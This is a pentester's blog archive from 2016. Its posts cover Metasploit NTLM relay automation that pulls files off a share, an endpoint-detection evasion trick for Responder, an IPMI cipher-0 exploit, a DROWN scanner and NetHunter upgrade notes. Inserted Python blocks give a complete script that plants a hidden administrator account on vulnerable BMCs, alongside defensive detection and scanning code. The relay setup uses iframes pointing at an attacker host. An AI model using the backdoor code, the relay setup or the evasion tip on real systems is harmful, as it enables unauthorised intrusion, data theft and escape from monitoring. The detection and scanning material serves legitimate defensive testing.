Sunday, July 24, 2016

Trying to automate the downloading of all files in a share using metasploit's http_ntlmrelay module with little recon.

Sorry for the long title. I have been trying to automate the downloading of all files on a share using Metasploit's http_ntlmrelay module. Here is the scenario: you are on a network with file servers that host the employees' Windows Documents folders and authenticate with NTLM. Active Directory allows anonymous read access, which you can use to find the file server's address and the share path the user has access to. Assuming you have only one shot to get the loot, I first use RTYPE SMB_LS to list the share, then use a sync file to parse the listing and download the first file found with SMB_GET. A resource file ties it all together; the resource file, the sync file and the page the victim loads are below.

use auxiliary/server/http_ntlmrelay
unset all
notes -d
# set RHOST to the file server found in AD and RURIPATH to the share path the user can reach
set RPORT 445
# phase 1 (URI /test1): list the share; the listing is stored as an ntlm_relay note
# (the RTYPE and run lines come from the description above; the post's copy omitted them)
set RTYPE SMB_LS
set URIPATH test1
run -j
# phase 2 (URI /test2): the sync file picks the first file from the note and SMB_GET fetches it
set RTYPE SMB_GET
set SYNCFILE syncfile.rb
set URIPATH test2
run -j

# syncfile.rb: evaluated by http_ntlmrelay before it relays, so it can read the SMB_LS result that phase 1 stored
print_status("looking for data...")
framework.db.notes.each do |note|
  next unless note.ntype == 'ntlm_relay'
  # note.data[:Response] holds the listing; the post's copy lost the receiver before [:Response], note.data is assumed here
  for app in note.data[:Response]
    p1 = app[1].to_s.split(",")
    if p1[0] == '{"type"=>"F"'
      # the post's snippet ends here, before the first file found is handed to the SMB_GET phase
    end
  end
end

<!-- page the victim's browser loads; each iframe triggers one NTLM relay -->
<iframe src="http://kali:8080/test1"></iframe>
<iframe src="http://kali:8080/test2"></iframe>

The issues I'm having are: this method can only download one file at the moment, and if the share's path goes deeper than one directory (i.e. path\to\share\), test1 does not authenticate properly and the attack fails. I have just started digging into the module's source but have not gotten anywhere yet. I will keep you posted if I figure anything out; if you have a solution please let me know! Thank you and enjoy.

Tuesday, May 17, 2016

Bypassing Symantec Endpoint SMB NTLM capture attack detection

A while back I was running Responder on a network to collect some hashes. To my surprise, the incident response team pinged me and asked whether alerts they were getting from Symantec Endpoint Protection [SEP] were from my activity. I social engineered them a little and they ended up sending me a screen cap, which said:
Attack: SMB Sniffer Negotiate Protocol Challenge Key 2
Googling that returned a Symantec page which gives a bit more information.

On that page it says:
This signature detects attempts to sniff SMB usernames and passwords through a known challenge key which can then be used to crack the passwords offline.
The key words there are "through a known challenge key". Responder sends the static default NTLM server challenge 1122334455667788 (the same fixed value Metasploit's capture modules use, kept static so NTLMv1 responses can be cracked with precomputed tables), and that is what SEP matches on. Responder is awesome and has a config file that lets you set the challenge to whatever you want, which then bypasses SEP's detection of the attack. On Kali 2 the file is /usr/share/responder/Responder.conf; change the Challenge line to something like 2211334455667788 and your attacks will go unnoticed by SEP. Happy hacking :)
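Since the signature is a byte match on the 8-byte ServerChallenge field of the NTLM Type 2 message, the same check is easy to reproduce on the defender's side. The Python below is an added example, not part of the post and not Responder's or Symantec's code: it builds constructed NTLM CHALLENGE_MESSAGE blobs (one with Responder's default challenge, one random), locates them inside a captured byte stream by their NTLMSSP signature, and flags the known static value. The SMB framing bytes and the target name are made up for the sample. Two practitioner caveats: a different fixed value such as 2211334455667788 defeats this one signature but is just as predictable, so anyone who captures it can precompute against it too, and current Responder releases also accept Challenge = Random in Responder.conf, which removes the indicator entirely at the cost of the precomputed NTLMv1 tables.

```python
import os
import struct
from typing import List, Tuple

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2  # MessageType of the NTLM Type 2 (CHALLENGE) message

# Static server challenges that signature-based IPS rules key on. 1122334455667788
# is the value shipped in Responder.conf and in Metasploit's capture modules.
KNOWN_STATIC_CHALLENGES = {bytes.fromhex("1122334455667788")}


def build_challenge_message(challenge: bytes, target_name: str = "WORKGROUP") -> bytes:
    """Construct a minimal NTLM CHALLENGE_MESSAGE carrying the given 8-byte challenge.

    Constructed test data for this example only. Layout per MS-NLMP 2.2.1.2:
    Signature, MessageType, TargetNameFields, NegotiateFlags, ServerChallenge,
    Reserved, TargetInfoFields, then payload. TargetInfo is left empty.
    """
    if len(challenge) != 8:
        raise ValueError("server challenge must be exactly 8 bytes")
    target = target_name.encode("utf-16-le")
    flags = 0x00018205  # UNICODE | REQUEST_TARGET | NTLM | ALWAYS_SIGN | TARGET_TYPE_DOMAIN
    fixed_len = 48      # size of the fixed fields when no Version field is sent
    msg = NTLMSSP_SIGNATURE
    msg += struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", len(target), len(target), fixed_len)   # TargetNameFields
    msg += struct.pack("<I", flags)
    msg += challenge                                                    # ServerChallenge
    msg += b"\x00" * 8                                                  # Reserved
    msg += struct.pack("<HHI", 0, 0, fixed_len + len(target))           # TargetInfoFields
    return msg + target


def extract_server_challenges(buf: bytes) -> List[bytes]:
    """Return the ServerChallenge of every NTLM Type 2 message inside buf.

    Scans for the NTLMSSP signature, so buf may be a bare NTLM blob or a captured
    SMB Session Setup / HTTP WWW-Authenticate payload with the message embedded
    (SPNEGO wrapping and base64 must already be decoded).
    """
    found = []
    pos = buf.find(NTLMSSP_SIGNATURE)
    while pos != -1:
        msg = buf[pos:]
        if len(msg) >= 32 and struct.unpack_from("<I", msg, 8)[0] == CHALLENGE_MESSAGE:
            found.append(bytes(msg[24:32]))            # ServerChallenge sits at offset 24
        pos = buf.find(NTLMSSP_SIGNATURE, pos + 1)
    return found


def classify_challenge(challenge: bytes) -> str:
    """'static-default' when the challenge matches a known tool default, else 'other'."""
    return "static-default" if challenge in KNOWN_STATIC_CHALLENGES else "other"


def scan(buf: bytes) -> List[Tuple[str, str]]:
    """(challenge hex, verdict) for each Type 2 message found in buf."""
    return [(c.hex(), classify_challenge(c)) for c in extract_server_challenges(buf)]


if __name__ == "__main__":
    # Constructed samples: one message with Responder's default challenge, one random.
    # The leading bytes stand in for the SMB/SPNEGO framing around the NTLM blob.
    framing = b"\xffSMB" + b"\x00" * 12
    for label, chal in (("responder-default", bytes.fromhex("1122334455667788")),
                        ("random", os.urandom(8))):
        print(label, scan(framing + build_challenge_message(chal, "CORP")))
```

Feed scan() the decoded NTLM payloads from an SMB or HTTP capture and anything reported as static-default is a capture tool (or a very unusual server), whatever hostname it is pretending to be.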

Saturday, March 12, 2016


There are a few good tools out there (Metasploit) to help you find and identify the IPMI cipher 0 vulnerability (cipher suite 0 on an IPMI 2.0 BMC means no authentication: any password is accepted for a valid username), but because it is relatively trivial to exploit I have seen nothing that helps you pwn it. While it is easy to exploit, I keep having to brush up on the commands every time I come across it, which is where my tool comes in.

My IPMIPWN tool does all the real work for you: it attempts to exploit the cipher 0 vulnerability using a list of predefined default user accounts and sets up a backdoor account with a semi-random username and random password. All successful backdoors are logged in loot.log. This tool works best on Kali; it requires ipmitool ("apt-get install ipmitool") and Nmap to be installed. Enjoy.
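The ipmitool sequence behind that workflow is the part worth having at hand. The Python below is an added example, not IPMIPWN's own code: it requests cipher suite 0 with -C 0, walks a constructed list of default usernames until one is accepted with a bogus password, plants an enabled ADMINISTRATOR account in a free user slot, and confirms the new credentials with a normal (authenticated) session. The channel number 1, user slot 10, the username list and the 192.0.2.10 target are assumptions; check them with "channel info" and "user list 1" on a real BMC. The runner is injectable so the logic can be exercised without a BMC.

```python
import secrets
import string
import subprocess
from typing import Callable, List, Optional, Tuple

# Usernames to try through the cipher-0 bypass (constructed list for this example;
# IPMIPWN ships its own). Only the username has to exist, the password does not matter.
DEFAULT_USERS = ["ADMIN", "admin", "root", "USERID", "Administrator"]
CHANNEL = "1"   # LAN channel; 1 on most BMCs, confirm with `ipmitool ... channel info`
SLOT = "10"     # free user ID to plant the account in; confirm with `user list 1`

Runner = Callable[[List[str]], bool]   # executes an argv, returns success


def ipmitool_cmd(host: str, user: str, password: str, *args: str) -> List[str]:
    """argv for one ipmitool call over RMCP+ (lanplus) requesting cipher suite 0.

    Cipher suite 0 means no authentication and no integrity: a vulnerable BMC
    accepts any password for an existing user, so "x" works as the password.
    """
    return ["ipmitool", "-I", "lanplus", "-C", "0", "-H", host,
            "-U", user, "-P", password, *args]


def run_quiet(argv: List[str]) -> bool:
    """Default runner: execute ipmitool and report success by exit status."""
    return subprocess.run(argv, capture_output=True, timeout=30).returncode == 0


def find_cipher0_user(host: str, run: Runner = run_quiet) -> Optional[str]:
    """First default username the BMC lets in with cipher 0, or None if patched."""
    for user in DEFAULT_USERS:
        if run(ipmitool_cmd(host, user, "x", "user", "list", CHANNEL)):
            return user
    return None


def random_creds() -> Tuple[str, str]:
    """Semi-random service-looking username and a 16-char password (the longest
    value every IPMI 2.0 BMC accepts; some allow 20)."""
    name = "svc" + "".join(secrets.choice(string.digits) for _ in range(4))
    alphabet = string.ascii_letters + string.digits
    return name, "".join(secrets.choice(alphabet) for _ in range(16))


def backdoor_plan(host: str, user: str, name: str, password: str,
                  slot: str = SLOT, channel: str = CHANNEL) -> List[List[str]]:
    """The ipmitool sequence that turns a free slot into an enabled admin account."""
    def c(*a: str) -> List[str]:
        return ipmitool_cmd(host, user, "x", *a)
    return [
        c("user", "set", "name", slot, name),
        c("user", "set", "password", slot, password),
        c("user", "priv", slot, "4", channel),           # 4 = ADMINISTRATOR
        c("channel", "setaccess", channel, slot,
          "callin=on", "ipmi=on", "link=on", "privilege=4"),
        c("user", "enable", slot),
    ]


def pwn(host: str, run: Runner = run_quiet) -> Optional[Tuple[str, str]]:
    """Exploit cipher 0 on host and plant an account; returns (name, password) or None."""
    user = find_cipher0_user(host, run)
    if user is None:
        return None
    name, password = random_creds()
    if not all(run(argv) for argv in backdoor_plan(host, user, name, password)):
        return None
    # Confirm the new account works on its own, with ipmitool's default cipher suite.
    check = ["ipmitool", "-I", "lanplus", "-H", host, "-U", name, "-P", password,
             "user", "list", CHANNEL]
    return (name, password) if run(check) else None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"   # assumed target
    creds = pwn(target)
    print("backdoor:", creds if creds else "not vulnerable, or slot/channel wrong")
```

The final check matters: a BMC that accepts the cipher 0 session but silently ignores "user enable" or the channel access change looks exploited but is not, and the verification with the new credentials is what separates the two.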

Get IPMIPWN from GitHub

Thursday, March 3, 2016

My Own DROWN Detection Tool

I had to find a quick way to detect the DROWN vulnerability on a large enterprise network. This falls more into the vulnerability management realm, but I was tasked with it nonetheless, and I thought others might get some use from my work here as well.

I didn't like the scanning tool from the DROWN researchers, and most of the systems in scope were internal so I couldn't use their online version either. I then tried OpenSSL, but the build that ships with Kali 2 does not support SSLv2 even though the help output says it does. I was going to recompile OpenSSL with SSLv2 support but that was proving to be a pain in the ass.

That's when I wrote a little bash script that uses Nmap and TestSSLServer to detect SSLv2 support on port 443 of a web server. All you need to do is provide a list of IPs and it goes to work; unlike the other tools available at the moment, the output is clear and easy to understand. It does lack features and support for other ports. If the tool proves popular I will be happy to add both. Enjoy and happy hacking :)
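The check Nmap's sslv2 script and TestSSLServer perform here is a single SSLv2 CLIENT-HELLO: a server that is DROWN-exposed answers with an SSLv2 SERVER-HELLO, anything else (a TLS alert, a reset, silence) means no SSLv2. The Python below is an added example, not the post's bash script, that does this directly on a socket so it works on a Kali box whose OpenSSL has SSLv2 compiled out. It offers all seven SSLv2 cipher specs and reports which ones the server returns, since the 40-bit export ciphers are what make the general DROWN attack cheap. The hosts.txt format, the probe port and the fixed 16-byte challenge are assumptions of this example; build_server_hello() exists only to produce constructed replies for offline testing. One caveat a practitioner needs: DROWN is about the RSA key, not the port. A host with SSLv2 disabled on 443 but enabled on 25, 465 or 993 with the same certificate is still exploitable, so probe every TLS port that shares the key.

```python
import socket
import struct
from typing import Dict, List, Optional

# SSLv2 cipher specs (3 bytes each). The 40-bit export ones are what make the
# general DROWN attack cheap; any SSLv2 support at all is the exposure.
SSLV2_CIPHERS = {
    b"\x01\x00\x80": "SSL2_RC4_128_WITH_MD5",
    b"\x02\x00\x80": "SSL2_RC4_128_EXPORT40_WITH_MD5",
    b"\x03\x00\x80": "SSL2_RC2_128_CBC_WITH_MD5",
    b"\x04\x00\x80": "SSL2_RC2_128_CBC_EXPORT40_WITH_MD5",
    b"\x05\x00\x80": "SSL2_IDEA_128_CBC_WITH_MD5",
    b"\x06\x00\x40": "SSL2_DES_64_CBC_WITH_MD5",
    b"\x07\x00\xc0": "SSL2_DES_192_EDE3_CBC_WITH_MD5",
}
EXPORT_CIPHERS = {b"\x02\x00\x80", b"\x04\x00\x80"}


def build_client_hello(challenge: bytes = b"\x11" * 16) -> bytes:
    """SSLv2 CLIENT-HELLO offering every SSLv2 cipher spec, under a 2-byte record header."""
    ciphers = b"".join(SSLV2_CIPHERS)
    body = (b"\x01\x00\x02"                                  # msg type 1, version 0x0002
            + struct.pack(">HHH", len(ciphers), 0, len(challenge))
            + ciphers + challenge)                          # no session id
    return struct.pack(">H", 0x8000 | len(body)) + body     # high bit = 2-byte header


def build_server_hello(cert: bytes, ciphers: List[bytes], conn_id: bytes = b"\xaa" * 16) -> bytes:
    """Constructed SSLv2 SERVER-HELLO, used here only to test the parser offline."""
    cipher_bytes = b"".join(ciphers)
    body = (b"\x04\x00\x01"                                  # type 4, no session hit, X.509
            + struct.pack(">HHHH", 0x0002, len(cert), len(cipher_bytes), len(conn_id))
            + cert + cipher_bytes + conn_id)
    return struct.pack(">H", 0x8000 | len(body)) + body


def parse_server_hello(data: bytes) -> Optional[Dict]:
    """Decode an SSLv2 SERVER-HELLO; None if the reply is anything else (TLS alert, empty)."""
    if len(data) < 2 or not data[0] & 0x80:
        return None
    length = ((data[0] & 0x7f) << 8) | data[1]
    body = data[2:2 + length]
    if len(body) < 11 or body[0] != 0x04:
        return None
    version, cert_len, cipher_len, conn_len = struct.unpack(">HHHH", body[3:11])
    if version != 0x0002 or len(body) < 11 + cert_len + cipher_len + conn_len:
        return None
    raw = body[11 + cert_len:11 + cert_len + cipher_len]
    ciphers = [raw[i:i + 3] for i in range(0, len(raw), 3)]
    return {
        "cert_len": cert_len,
        "ciphers": [SSLV2_CIPHERS.get(c, c.hex()) for c in ciphers],
        "export": any(c in EXPORT_CIPHERS for c in ciphers),
    }


def probe(host: str, port: int = 443, timeout: float = 5.0) -> Optional[Dict]:
    """Send one CLIENT-HELLO to host:port and return the parsed SERVER-HELLO, if any."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello())
        data = s.recv(2)
        if len(data) == 2 and data[0] & 0x80:               # read the whole SSLv2 record
            need = 2 + (((data[0] & 0x7f) << 8) | data[1])
            while len(data) < need:
                chunk = s.recv(need - len(data))
                if not chunk:
                    break
                data += chunk
    return parse_server_hello(data)


def verdict(result: Optional[Dict]) -> str:
    if result is None:
        return "no SSLv2"
    return "SSLv2 + export ciphers (DROWN)" if result["export"] else "SSLv2 (DROWN)"


if __name__ == "__main__":
    import sys
    # Usage: python drown_probe.py hosts.txt   (one host[:port] per line, assumed format)
    for line in open(sys.argv[1]):
        host, _, port = line.strip().partition(":")
        if not host:
            continue
        try:
            print(host, verdict(probe(host, int(port or 443))))
        except OSError as exc:
            print(host, "error:", exc)
```

Servers that never speak SSLv2 usually answer the 2-byte-header hello with a TLS alert record (0x15 ...) or close the connection, both of which parse_server_hello() reports as no SSLv2; a full SERVER-HELLO with the certificate is the only positive result.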

Get the DROWN Detection Tool from GitHub.

**UPDATE: Thanks to ngharo for the code contribution. Already merged your changes into master!

Tuesday, February 23, 2016

Low Hanging Fruit Initiative

The Low Hanging Fruit Initiative [LHFI] is my own little project to make life easier on pen-testers like myself. Not that life is that hard for me; I'm just lazy, and as I go along I find things that should be simple are overly complex, overlooked, or underappreciated. So I develop tools, scripts, etc. to get the most juice I can from the low hangers and fill what I feel are gaps in the process of exploitation. Not passing up quarters for dollars has allowed me to take my game to a new level.

The way I see it, the bad guys are not coming into networks and focusing only on the vulnerabilities with CVSS scores of 10; they are searching the network for anything they can get their hands on to further their penetration or increase the scope of the breach, and I don't understand why we can't do the same. Whenever things like this are talked about, they always take the defender approach or the cracker approach; it's never really looked at from a pen-tester's perspective. Some might say the cracker's and pen-tester's approach should be the same, but they operate under a different set of restrictions, the most prominent being time for pen-testers, where often the quarters are passed up for a dollar to save time and keep costs low. I'm not saying people need to rethink their current process, just that maybe they should add a step or two. After you have found all the show stoppers, take time to revisit the mediums and lows; maybe there is a gem waiting to be discovered using the scripts found here, elsewhere, or your own.

The overall goal of the LHFI is to help pen-testers penetrate deeper into a network from more places. I hope this will lead to better secured and more resilient networks, which is good for everyone. To denote which posts contribute to the LHFI I will start using the LHFI label. If you have scripts, programs, etc. that you think fit under LHFI please let me know. I would be happy to showcase them on my blog. Thank you for reading and happy hacking.

Monday, January 18, 2016

Upgrading to NetHunter 2 on Nexus 7

I love Kali, so naturally I put NetHunter 1 on my old Nexus 7 tablet and used it for a while, but then NetHunter 2 came along and didn't really offer an upgrade path from 1 to 2. Everything was geared to first installs. Lucky for me, the process was really easy if you already have NetHunter on your tablet.

Basically all I had to do was put the new NetHunter zip file downloaded from HERE on the root of the sdcard and boot into Fastboot mode (from a powered-down state, press and hold the power + volume down buttons). Then I selected recovery mode and used the TeamWin recovery (it was still set up from when I first installed NetHunter 1) to install the zip from the sdcard, and poof, NetHunter was updated to the latest version. I did lose all data, but I don't keep anything on it so that was no big deal.

The one hang up I have found so far is you need to get pciutils for wifite to work. Just run the following command:
apt-get install pciutils

Thank you and happy hacking :)